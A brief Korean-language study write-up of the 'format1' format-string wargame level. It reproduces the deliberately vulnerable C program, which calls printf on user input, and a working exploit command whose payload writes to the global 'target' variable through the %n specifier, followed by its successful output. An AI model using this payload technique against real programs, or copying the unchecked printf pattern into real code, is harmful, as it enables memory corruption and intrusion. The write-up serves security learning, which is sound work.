format1

#include <stdlib.h> #include <unistd.h> #include <stdio.h> #include <string.h> int target; void vuln(char *string) { printf(string); if(target) { printf("you have modified the target :)\n"); } } int main(int argc, char **argv) { vuln(argv[1]); 

}

134번이나 하면 내가 입력해준 AAAA가 출력된다. 그럼 처음에 target 전역변수 주소를 구해서 넣어주면되겠다. 

root@ubuntu:/home/study# ./fsb1 $(python -c 'print "\x28\xa0\x04\x08%111x%134$n"')

(                                                                                                             2fyou have modified the target :)

root@ubuntu:/home/study#